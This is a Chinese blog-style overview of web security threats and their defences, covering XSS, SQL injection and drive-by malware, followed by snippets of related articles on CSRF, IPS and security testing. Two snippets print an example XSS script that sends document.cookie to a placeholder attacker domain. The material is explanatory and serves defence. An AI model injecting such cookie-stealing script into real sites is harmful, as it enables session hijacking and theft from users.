web安全威胁以及防御

一、跨站脚本攻击(XSS)

      定义:

XSS又叫CSS (Cross Site Script) 。最危险和最常见的安全漏洞之一,这个漏洞是通常用于执行cookie窃取、恶意软件传播,会话劫持,恶意重定向。

分为三种类型:

1,非持久性XSS。劫持链接。最常用,使用最广。带有恶意脚本代码参数的URL被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。

2,持久性XSS(存储性)。指的是恶意脚本代码被存储进被攻击的数据库。这种攻击类型通常在留言板等地方出现。

3,基于 DOM 的 XSS。也称为”type-0 XSS”。它发生时, XSS 变量执行由 DOM 修改用户的浏览器网页的结果。在客户端的 HTTP 响应不会更改,但以恶意的方式执行的脚本。这这是最先进和最知名的type-0 XSS。大多数情况下,这个漏洞之所以存在是因为开发商不了解它是如何工作。

  预防:

      1,过滤 HTML 标记。例如URL、HTTP引用对象、从表单中获取参数、表单 POST 的参数、window.location、document.referrer、document.location、document.url、document.urlunencoded。通过HtmlEncode()方法编码html。

2,过滤编码特殊字符。例如且、单引号、双引号、下划线; &过滤为&amp;   <过滤为 &lt;    > 过滤为 &gt;   ” 过滤为 &quot;   ‘ 过滤为'   /过滤为/

3,过滤主要的数据。例如cookie数据、标题数据、数据库中的数据。

常用的工具类库

      1,AntiXSS,由微软推出的用于防止XSS攻击的一个类库。它的实现原理也是使用白名单机制。AntiXss.GetSafeHtmlFragment(html)方法,这个方法会替换掉html里的危险字符

二、DDOS攻击

三、SQL注入攻击

      定义

      通过提交精心构造的SQL语句,窃取数据库数据或者修改破坏数据库。其方式隐蔽,不易察觉。

 预防

       1,利用SqlCommand传参数。

2,过滤关键字,禁止运行法。

3,存储过程

四、网页挂马攻击

代码开发阶段要从两方面入手,其一是开发项目要制定编码规范,尤其要注意非法输入检查以及避免溢出漏洞;其二是在Web系统开发结束后,利用商用Web程序安全性评估软件或者评估服务对Web系统的安全性进行测试评估。

时间: 2024-10-14 00:49:15

web安全威胁以及防御的相关文章

总结几种常见web攻击手段及其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 DDOS web安全系列目录 总结几种常见web攻击手段极其防御方式 总结几种常见的安全算法 XSS 概念 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="

总结几种常见web攻击手段极其防御方式

本文简单介绍几种常见的攻击手段及其防御方式 XSS(跨站脚本攻击) CSRF(跨站请求伪造) SQL注入 总结几种常见web攻击手段极其防御方式 XSS 概念 全称是跨站脚本攻击(Cross Site Scripting),指攻击者在网页中嵌入恶意脚本程序. 案列 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样的 <script>window.open("www.gongji.com?param="+document.cookie)</scrip

web攻击方式和防御方法

在http请求报文中加载攻击代码,就能发起对web应用的攻击.通过url查询字段或者表单.http首部.cookie等途径吧攻击代码传入,若这时web应用存在安全漏洞,那内部信息就会遭到窃取! 对web的攻击模式有两种: 主动攻击(主动攻击服务器) 被动攻击(上传木马程序,用户访问时触发http陷阱) 实施的安全策略主要分为两步: 客户端验证 服务端验证(输入值验证,输出值转义) 两种主要的攻击方式 1.SQL注入攻击(php防止方法是使用mysqli_real_escape_string或者a

Linux -- 利用IPS(入侵防御系统) 构建企业Web安全防护网

一.IPS系统简介 (应用层上应用) 防火墙只在网络层上应用,IPS 和防火墙相比,检测及过滤功能更为强大,它通过串联在网络主干线路上,对防火 墙所不能过滤的攻击进行过滤.这样一个两级的过滤模式,可以最大地保证系统的安全.在 一些专业的机构,或对网络安全要求比较高的地方,IPS和其他审计跟踪产品结合,可以提 供针对网络信息资源全面的审计资料,这些资料对于攻击还原.入侵取证.异常事件识别. 网络故障排除等等都有很重要的作用. 作为串接部署的设备,IPS必须要确保用户业务不受影响,错误的阻断必定意味

《白帽子讲WEB安全》学习笔记之第1章 我的安全世界观

第1章 我的安全世界观 1.1 web安全简史 1.1.1 中国黑客简史 现在中国乃至全世界的黑客或者说是骇客已经进入了"黑暗时代",因为互联网存在这大量的利益. 1.1.2 黑客技术的发展历程 1.1.3 web安全的兴起 web安全是信息安全领域的一个重要的分支,但是中国目前对web安全的重视程度远远不足. 为什么要攻击Web应用,我认为主要有以下几个原因: q  web应用无处不在. q  相比较与操作系统等的安全防御能力,攻破web更容易一些. q  攻击web可以来无影去无踪

威胁驱动的网络安全方法论

声明:本文主要内容取自洛克希德·马丁公司的论文——A Threat-Driven Approach to Cyber Security,鉴于原论文篇幅较长只提取了其中部分内容,想要全面准确了解论文内容的朋友建议去阅读原文.笔者翻译这部分内容,希望能够抛砖引玉,为相关领域的相关工作人员带来一点不同的思路或启发,从而更好地维护企业/组织的网络安全.欢迎交流与指正,转载请联系[email protected]. 安全界早已有'未知攻,焉知防'的说法,但如果我们对于攻防存在不正确的认知,就很难理解如何做

使用 Rational AppScan 保证 Web 应用的安全性,第 1 部分: Web 安全与 Rational AppScan 入门

前言 当今世界,Internet(因特网)已经成为一个非常重要的基础平台,很多企业都将应用架设在该平台上,为客户提供更为方便.快捷的服务支持.这些应用 在功能和性能上,都在不断的完善和提高,然而在非常重要的安全性上,却没有得到足够的重视.由于网络技术日趋成熟,黑客们也将注意力从以往对网络服务器的 攻击逐步转移到了对 Web 应用的攻击上.根据 Gartner 的最新调查,信息安全攻击有 75% 都是发生在 Web 应用而非网络层面上.同时,数据也显示,三分之二的 Web 站点都相当脆弱,易受攻击

CSRF——攻击与防御

CSRF——攻击与防御 author: lake2 0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你能够把它想做HTTP会话劫持.    站点是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个标识其身份的cookie,仅仅要不关闭浏览器或者退出登录,以后訪问这个站点会带上这个

CSRF之攻击与防御

0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情--这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持.    网站是通过cookie来识别用户的,当用户成功进行身份验证之后浏览器就会得到一个标识其身份的cookie,只要不关闭浏览器或者退出登录,以后访问 这个网站会带上这个cookie.如果这期间浏览器被人控制着请求了这个网